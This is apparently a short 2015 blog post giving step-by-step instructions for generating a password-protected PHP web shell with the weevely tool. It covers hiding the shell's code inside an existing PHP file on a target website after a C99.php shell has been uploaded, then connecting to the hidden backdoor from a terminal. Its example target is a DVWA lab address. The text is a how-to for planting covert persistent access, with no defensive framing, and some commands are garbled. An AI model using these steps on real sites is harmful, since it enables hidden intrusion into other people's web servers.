Kamis, 03 September 2015

Create a backdoor by using weevely, insert into the target web and backdoor access through the terminal

Once Backdoor C99.php we upload to the web, now we will try to insert a php script that we make with weevely into the web and hide it in php files belonging to the target web.

 1. Create a file using the backdoor php weevely with the following command:
# Weevely generate 1234 silentbd.php


 2. Copy the script that is in the php file that we created earlier in the php file that is in the target web,here I will try to insert the script in the view_source_all.php file in the web directory.  
Then the backdoor access through the terminal with the following command:
# Weevely http: // web ipaddres target / folder / name backdoor password
# Weevely http://192.168.1.123/dvwa/vulnerabelity/silentdb.php 1234
 
easy does not it? yes of course easier if you are willing to learn and read more certainly will be more stable

Tidak ada komentar:

Posting Komentar